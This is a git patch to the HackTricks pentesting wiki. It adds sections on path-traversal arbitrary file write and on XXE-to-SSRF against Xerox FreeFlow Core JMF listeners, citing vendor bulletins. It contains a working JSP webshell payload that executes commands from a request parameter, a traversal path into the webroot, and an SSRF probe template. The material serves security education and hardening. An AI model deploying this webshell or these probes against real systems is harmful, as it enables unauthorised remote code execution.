From 5d3a70fc017b6541777e64972f1cb9243c43a297 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 16 Aug 2025 12:42:17 +0000 Subject: [PATCH] Add content from: From Support Ticket to Zero Day --- src/pentesting-web/file-inclusion/README.md | 52 ++++++++++++++++++- .../xxe-xee-xml-external-entity.md | 38 ++++++++++++-- 2 files changed, 85 insertions(+), 5 deletions(-) diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index bb70a0832..8aa38e9a1 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -478,7 +478,55 @@ For the technical details check the mentioned post! ## LFI2RCE -### Remote File Inclusion +### Arbitrary File Write via Path Traversal (Webshell RCE) + +When server-side code that ingests/uploads files builds the destination path using user-controlled data (e.g., a filename or URL) without canonicalising and validating it, `..` segments and absolute paths can escape the intended directory and cause an arbitrary file write. If you can place the payload under a web-exposed directory, you usually get unauthenticated RCE by dropping a webshell. + +Typical exploitation workflow: +- Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.). +- Determine web-exposed directories. Common examples: + - Apache/PHP: `/var/www/html/` + - Tomcat/Jetty: `/webapps/ROOT/` → drop `shell.jsp` + - IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx` +- Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content. +- Browse to the dropped payload and execute commands. + +Notes: +- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload. +- On Java stacks, these file writes are often implemented with simple `File`/`Paths` concatenation. Lack of canonicalisation/allow-listing is the core flaw. + +Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal): + +```xml + + + + + ../../../webapps/ROOT/shell.jsp + + + <% + String c = request.getParameter("cmd"); + if (c != null) { + Process p = Runtime.getRuntime().exec(c); + try (var in = p.getInputStream(); var out = response.getOutputStream()) { + in.transferTo(out); + } + } + %> + ]]> + + + +``` + +Hardening that defeats this class of bugs: +- Resolve to a canonical path and enforce it is a descendant of an allow-listed base directory. +- Reject any path containing `..`, absolute roots, or drive letters; prefer generated filenames. +- Run the writer as a low-privileged account and segregate write directories from served roots. + +## Remote File Inclusion Explained previously, [**follow this link**](#remote-file-inclusion). @@ -689,6 +737,8 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._ - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal) - [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders) +- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/) +- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf) {{#file}} EN-Local-File-Inclusion-1.pdf diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index 3cf80f0fb..70af16266 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -77,7 +77,7 @@ In **Java** based applications it might be possible to **list the contents of a ```xml -]>&xxe; +&xxe; ]>&xxe; @@ -168,7 +168,7 @@ _**Please notice that external DTD allows us to include one entity inside the se ### **Error Based (system DTD)** -So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)?. +So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** (external connections aren't available)? A loophole in the XML language specification can **expose sensitive data through error messages when a document's DTD blends internal and external declarations**. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information. @@ -867,6 +867,34 @@ If the application must support DTDs internally, keep `disallow-doctype-decl` di Real-world case study: **CVE-2025-27136** in the Java S3 emulator *LocalS3* used the vulnerable constructor shown above. An unauthenticated attacker could supply a crafted XML body to the `CreateBucketConfiguration` endpoint and have the server embed local files (for example `/etc/passwd`) in the HTTP response. +### XXE in JMF/Print Orchestration Services → SSRF + +Some print workflow/orchestration platforms expose a network-facing Job Messaging Format (JMF) listener that accepts XML over TCP. If the underlying parser accepts a `DOCTYPE` and resolves external entities, you can leverage a classical XXE to force the server to make outbound requests (SSRF) or access local resources. + +Key points observed in the wild: +- Network listener (e.g., JMF client) on a dedicated port (commonly 4004 in Xerox FreeFlow Core). +- Java-based XML parsing inside a jar (e.g., `jmfclient.jar`) without `disallow-doctype-decl` or entity resolution disabled. +- Out-of-band callbacks reliably confirm exploitation. + +Minimal JMF-style SSRF probe (structure varies by product but the DOCTYPE is what matters): + +```xml + + +]> + + &probe; + +``` + +Notes: +- Replace the entity URL with your collaborator. If SSRF is possible the server will resolve it while parsing the message. +- Hardenings to look for: `disallow-doctype-decl=true`, `external-general-entities=false`, `external-parameter-entities=false`. +- Even when the JMF port does not serve files, SSRF can be chained for internal recon or to reach management APIs bound to localhost. + +References for this vector are listed at the end of the page. + ## References - [OffSec Blog – CVE-2025-27136 LocalS3 XXE](https://www.offsec.com/blog/cve-2025-27136/) @@ -882,6 +910,8 @@ Real-world case study: **CVE-2025-27136** in the Java S3 emulator *LocalS3* used - [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42) - [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279) +- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core XXE/SSRF + Path Traversal)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/) +- [Xerox FreeFlow Core Security Guide (architecture/ports)](https://securitydocs.business.xerox.com/wp-content/uploads/2025/03/Security-Guide-Information-Assurance-Disclosure-Xerox-FreeFlow-Core-8.0.pdf) +- [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf) -{{#include ../banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}} \ No newline at end of file